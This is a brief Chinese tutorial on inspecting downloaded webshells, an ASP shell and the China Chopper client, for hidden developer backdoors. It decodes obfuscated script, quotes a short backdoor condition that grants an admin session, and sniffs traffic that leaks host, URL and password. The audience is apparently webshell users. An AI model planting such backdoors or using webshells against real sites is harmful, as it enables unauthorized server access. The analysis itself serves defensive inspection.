webshell后门分析
什么是WebShell
顾名思义,“web”的含义是需要服务器开放web服务;“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
很多时候我们下载很多别人的webshell,我们要去判断这个webshell有没有后门,有的开发者通过后门让使用者中病毒,同时令目标网站有后门,从而获取我们的资源
(其实很多广告就是一种后门)
php,asp,jsp等都可以用记事本打开
首先先把密码改了
大马后门分析
1、解密脚本代码
通过查找代码非法登录几个关键字,发现这段代码是经过加密的,于是把函数execute改为msgbox这个函数, 进行解密明文输出
之后将文件格式改为VBS脚本执行
2、分析后门代码
if request("%")="%" then
Session("web2a2dmin") = UserPass
URL()
end if
3、编写后门利用工具
中国菜刀一句话后门分析
菜刀与大马不同 ,才用的CS框架,看不见源代码
因此通过协议来看有没有后门
打开WSockExpert软件,也可以选择其它抓包软件,选择需要监听的“中国菜刀”程序进程,双击
这个抓包软件可以针对windows下的进程进行抓包
在包中可以看见文件名
有一个包有一段代码开头为 密码=
采用base64解密代码
(有可能有的时候两层)
解码之后发现这段代码是把使用者主机名(菜刀链接地址)+URL+密码 发送给了开发者
其它脚本后门分析
我们可以通过通信解决有没有后门
最后在登录状态下
密码框 查看元素 网络
之后点击登录
仔细观察文件那里
点开之后可以看到也是把我们访问的文件发送给开发者了